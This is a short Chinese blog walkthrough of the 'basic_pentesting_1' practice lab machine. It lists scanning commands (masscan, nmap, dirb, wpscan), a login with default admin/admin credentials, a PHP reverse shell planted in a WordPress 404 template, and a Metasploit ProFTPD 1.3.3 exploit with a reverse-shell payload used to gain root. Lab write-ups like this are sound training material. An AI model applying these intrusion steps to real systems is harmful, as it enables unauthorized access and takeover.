靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153
21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24
msf没发现可利用漏洞
wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了
404界面写入phpshell
shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php


把IP和port改成自己的,监听反弹
404监听不行,监听不到
WordPress 6.4.1
上传可以
在上传路径找到自己上传文件

换个方法
ftp端口开着
ProFTPD
搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值